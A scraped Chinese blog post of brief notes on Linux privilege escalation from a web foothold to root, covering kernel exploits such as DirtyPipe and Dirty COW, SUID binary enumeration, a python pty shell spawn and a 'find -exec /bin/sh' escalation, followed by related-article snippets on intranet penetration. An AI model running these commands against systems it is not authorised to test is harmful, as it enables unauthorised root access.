内网提权--linux提权

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量297 收藏 5
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hakksjss/article/details/139054274
版权
一般通过漏洞( www-data -------- 》本地管理员( root

1、内核提权(脏牛家族)

1.1 先枚举内核信息(得到那些漏洞可以用来提权)
使用对应的提权脚本
[CVE-2022-0847] DirtyPipe 为例,下载 exp
编译 exp
gcc dirtypipez.c -o test # .c 编译成可执行文件
使用 test 文件即可提权
注:尽量保证自己编辑代码的 gcc 版本和使用代码的 gcc 版本一致
否则无法运行,会提示依赖库不存在等问题

脏牛dirtyc0w.c

2、特权命令suid

find / -perm -u = s -type f 2 >/dev/null #4755
find / -perm -g = s -type f 2 >/dev/null #
python -c "import pty;pty.spawn('/bin/bash');"
拥有交互 shell 界面的命令,若存在 suid 的情况则可以提权
vim
less
more
find
  find testtest -exec /bin/sh \;
亿林网络
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
部分渗透文章
04-16
突破拿shell,及内渗透,个人研究与应用,Linux下的渗透,xss与社工,基本知识,实例
linux 离线安装perl-IPC-Cmd
12-25
linux 离线安装perl-IPC-Cmd
linux-内开发环境域名代理服务
08-13
开发环境域名代理服务,本地开发环境代理和配置
CVE-2020-0787本地
02-22
使用方法: 1.资源放到桌面 2.打开cmd 3.输入Exp.exe "cmd whoami > \\\\.\\pipe\\showme " show
渗透测试-工具
05-25
渗透测试,工具
Centos5-6
08-13
linux,通常的流程是 拿到Webshell -> 传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行 -> 获得root -> 创建后门 -> 内渗透如社工/sync等渗透 先来从基础的EXP说起来吧
linux版Metasploit
04-06
linux版Metasploit,支持各个linux发行版本,一键安装,一键日穿内
Linux内渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内渗透技术,分为容器逃逸、Linux 、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
sec-interview:信息安全面试题汇总
07-24
mysql方式有哪些?利用条件是什么? (★) windows+mysql,存在sql注入,但是机器无外限,可以利用吗? (★) 常用的信息收集手段有哪些,除去路径扫描,子域名爆破等常见手段,有什么猥琐的方法收集企业信息?
攻防--Linux
h1nt的博客
08-17 1102
Linux一文通 前言 原文来自于https://www.freebuf.com/articles/251884.html 感觉很多都是机翻,还有些大大小小的格式问题 遂去外找到原文重新翻译排版了一遍,同时也参考了原文的翻译 0x01 Linux描述 大多数计算机系统设计为可与多个用户一起使用。特是指允许用户执行的操作。普通特包括查看和编辑文件或修改系统文件。特升级意味着用户获得他们无获得的特。这些特可用于删除文件,查看私人信息或安装不需要的程序,例如病毒。通常,当系统存在允许
--Windows方式总结
Kevin's Blog
04-29 2104
文章目录一、含义二、环境搭建2.1 环境一览2.2 靶机环境搭建三、信息收集四、主动攻击4.1 系统漏洞4.2 密码破解五、被动攻击 一、含义   高自己在服务器中限(主要针对在站入侵过程中,通过各种漏洞获得最高限的操作过程) 二、环境搭建 2.1 环境一览 Windows 10 1809(宿主机) VMware Workstation 15 Pro(虚拟机) Windo...
安全-Linux
菜鸟-宇的个人博客
10-24 32
渗透--linux
hee_mee的博客
07-28 484
zeroNIl
等保测评和安全运维
weixin_64392888的博客
06-11 632
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对络安全威胁,构建起一个全面、动态的络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1353
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 235
飞驰云联是中国领先的数据安全传输解决方案供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 948
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 685
安全漏洞扫描工具
渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的络隧道,可以用于在内环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的域名字段来传输数据。 在DNS隧道中,攻击者利用内中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的域名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内主机。内主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内防火墙和其他安全设备的检测,可以在内环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内环境中可以采取以下措施: 1. 禁止内主机直接访问外部DNS服务器,只允许内主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值